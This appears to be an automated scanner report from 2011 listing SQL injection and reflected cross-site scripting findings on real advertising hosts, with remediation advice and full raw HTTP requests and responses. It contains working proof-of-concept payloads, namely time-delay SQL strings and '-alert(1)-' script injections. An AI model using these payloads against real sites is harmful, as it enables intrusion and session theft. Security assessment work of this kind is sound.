SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The siteId parameter appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the siteId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /adx/ZonePlanCounts.ashx?siteId=1245waitfor%20delay'0%3a0%3a20'-- HTTP/1.1 Host: run.admost.com Proxy-Connection: keep-alive Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea66d80addda User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The uid cookie appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the uid cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /adx/get.ashx?z=2012&lang=en&page=videodetay&categoryid=[11][16]&videoid=379705&browser=iexplorer&hq=0 HTTP/1.1 Host: run.admost.com Proxy-Connection: keep-alive Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea66d80addda User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: locc={"city":"Dallas","countryCode":"US","regionName":"Texas","countryName":"United States","region":"TX"}; tco=23.04.2011 20:35:20; uid=43BD3B0296C')waitfor%20delay'0%3a0%3a20'--; sid=7242052A842
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edbcb'-alert(1)-'c7bb2b8b2fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/iblocal.rubiconmcclatchy.ronedbcb'-alert(1)-'c7bb2b8b2fd/audience;sz=300x250;click=http://data.ad.yieldmanager.net/click2,AAAAAAAAAABb2i5RAAAAAFPjWS8AAAAAAgAAAAIAAAAAAP8AAAAHFzdA5wYAAACADzezBwAAAIAPpBkvAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABDugIGAAAAAAIAAwAAAAAAF11uhS8BAAABAQAAATNhOWYwZGJlLTZlMWUtMTFlMC05OTZkLThmYmNhMGNmNTA0YgAgbSsAAAA=RcMqANluNQFHVKAB,,http%3A%2F%2Fwww.star-telegram.com%2F2011%2F04%2F23%2F3022014%2Fyour-smartphone-knows-where-youve.html,;ord=4049553634? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 470 Date: Sun, 24 Apr 2011 03:11:05 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Tue, 24-May-2011 03:11:05 GMT
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a84e2'-alert(1)-'53e58deb728 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/iblocal.rubiconmcclatchy.ron/audiencea84e2'-alert(1)-'53e58deb728;sz=300x250;click=http://data.ad.yieldmanager.net/click2,AAAAAAAAAABb2i5RAAAAAFPjWS8AAAAAAgAAAAIAAAAAAP8AAAAHFzdA5wYAAACADzezBwAAAIAPpBkvAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABDugIGAAAAAAIAAwAAAAAAF11uhS8BAAABAQAAATNhOWYwZGJlLTZlMWUtMTFlMC05OTZkLThmYmNhMGNmNTA0YgAgbSsAAAA=RcMqANluNQFHVKAB,,http%3A%2F%2Fwww.star-telegram.com%2F2011%2F04%2F23%2F3022014%2Fyour-smartphone-knows-where-youve.html,;ord=4049553634? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 470 Date: Sun, 24 Apr 2011 03:11:05 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Tue, 24-May-2011 03:11:05 GMT
2.3. http://a.collective-media.net/adj/iblocal.rubiconmcclatchy.ron/audience [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/iblocal.rubiconmcclatchy.ron/audience
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fc34'-alert(1)-'bff7e746697 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/iblocal.rubiconmcclatchy.ron/audience;sz=300x250;click=http://data.ad.yieldmanager.net/click2,AAAAAAAAAABb2i5RAAAAAFPjWS8AAAAAAgAAAAIAAAAAAP8AAAAHFzdA5wYAAACADzezBwAAAIAPpBkvAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABDugIGAAAAAAIAAwAAAAAAF11uhS8BAAABAQAAATNhOWYwZGJlLTZlMWUtMTFlMC05OTZkLThmYmNhMGNmNTA0YgAgbSsAAAA=RcMqANluNQFHVKAB,,http%3A%2F%2Fwww.star-telegram.com%2F2011%2F04%2F23%2F3022014%2Fyour-smartphone-knows-where-youve.html,;ord=4049553634?&3fc34'-alert(1)-'bff7e746697=1 HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 474 Date: Sun, 24 Apr 2011 03:11:04 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Tue, 24-May-2011 03:11:04 GMT
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1401'-alert(1)-'d01cba75e60 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/iblocal.rubiconmcclatchy.ron/audience;sz=300x250;click=http://data.ad.yieldmanager.net/click2,AAAAAAAAAABb2i5RAAAAAFPjWS8AAAAAAgAAAAIAAAAAAP8AAAAHFzdA5wYAAACADzezBwAAAIAPpBkvAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABDugIGAAAAAAIAAwAAAAAAF11uhS8BAAABAQAAATNhOWYwZGJlLTZlMWUtMTFlMC05OTZkLThmYmNhMGNmNTA0YgAgbSsAAAA=RcMqANluNQFHVKAB,,http%3A%2F%2Fwww.star-telegram.com%2F2011%2F04%2F23%2F3022014%2Fyour-smartphone-knows-where-youve.html,;ord=4049553634?d1401'-alert(1)-'d01cba75e60 HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 471 Date: Sun, 24 Apr 2011 03:11:03 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Tue, 24-May-2011 03:11:03 GMT
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ff8f'-alert(1)-'719f38ddf18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj7ff8f'-alert(1)-'719f38ddf18/iblocal.rubiconmcclatchy.ron/audience;sz=300x250;net=iblocal;ord=4049553634;ord1=908824;cmpgurl=http%253A//www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sun, 24 Apr 2011 03:11:06 GMT Connection: close Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:06 GMT Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sun, 24-Apr-2011 11:11:06 GMT Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:06 GMT Content-Length: 7668
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-68133549_1303614666","http://ad.doubleclick.net/adj7ff8f'-alert(1)-'719f38ddf18/iblocal.rubiconmcclatchy.ron/audience;net=iblocal;u=,iblocal-68133549_1303614666,11f8f328940989e,gadg,dx.16;;cmw=owl;sz=300x250;net=iblocal;ord1=908824;contx=gadg;dc=w;btg=dx.16;ord=4049553634?","300" ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4810'-alert(1)-'0cd03c4b95e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/iblocal.rubiconmcclatchy.rone4810'-alert(1)-'0cd03c4b95e/audience;sz=300x250;net=iblocal;ord=4049553634;ord1=908824;cmpgurl=http%253A//www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sun, 24 Apr 2011 03:11:06 GMT Connection: close Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:06 GMT Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sun, 24-Apr-2011 11:11:06 GMT Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:06 GMT Content-Length: 7660
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-85131481_1303614666","http://ad.doubleclick.net/adj/iblocal.rubiconmcclatchy.rone4810'-alert(1)-'0cd03c4b95e/audience;net=iblocal;u=,iblocal-85131481_1303614666,11f8f328940989e,gadg,dx.16;;sz=300x250;net=iblocal;ord1=908824;contx=gadg;dc=w;btg=dx.16;ord=4049553634?","300","250",true);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5783e'-alert(1)-'6610fd28a51 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/iblocal.rubiconmcclatchy.ron/audience5783e'-alert(1)-'6610fd28a51;sz=300x250;net=iblocal;ord=4049553634;ord1=908824;cmpgurl=http%253A//www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sun, 24 Apr 2011 03:11:06 GMT Connection: close Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:06 GMT Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sun, 24-Apr-2011 11:11:06 GMT Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:06 GMT Content-Length: 7658
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-7983029_1303614666","http://ad.doubleclick.net/adj/iblocal.rubiconmcclatchy.ron/audience5783e'-alert(1)-'6610fd28a51;net=iblocal;u=,iblocal-7983029_1303614666,11f8f328940989e,gadg,dx.16;;sz=300x250;net=iblocal;ord1=908824;contx=gadg;dc=w;btg=dx.16;ord=4049553634?","300","250",true);</scr'+'ipt> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b84ad'-alert(1)-'66cb81808d3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/iblocal.rubiconmcclatchy.ron/audience;sz=b84ad'-alert(1)-'66cb81808d3 HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sun, 24 Apr 2011 03:11:04 GMT Connection: close Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:04 GMT Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sun, 24-Apr-2011 11:11:04 GMT Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:04 GMT Content-Length: 7636
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... tiveMedia.createAndAttachAd("iblocal-17384975_1303614664","http://ad.doubleclick.net/adj/iblocal.rubiconmcclatchy.ron/audience;net=iblocal;u=,iblocal-17384975_1303614664,11f8f328940989e,none,dx.16;;sz=b84ad'-alert(1)-'66cb81808d3;contx=none;dc=w;btg=dx.16?","b84ad'-alert(1)-'66cb81808d3","",true);</scr'+'ipt> ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4695"-alert(1)-"14cee7ecabd was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3671.MSNcashback.com/B5398653.8;sz=300x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669f4695"-alert(1)-"14cee7ecabd&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=;ord=1916340643? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... st4GNetwork_7999_Static.jpg"; var minV = 8; var FWH = ' width="300" height="600" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669f4695"-alert(1)-"14cee7ecabd&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af2/17/dc/%2a/z%3B240173615%3B0-0%3B0%3B62497243%3B4986-300/ ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bc2e"-alert(1)-"753a23f325e was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3671.MSNcashback.com/B5398653.8;sz=300x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=44147784&AN=19163406439bc2e"-alert(1)-"753a23f325e&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=;ord=1916340643? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
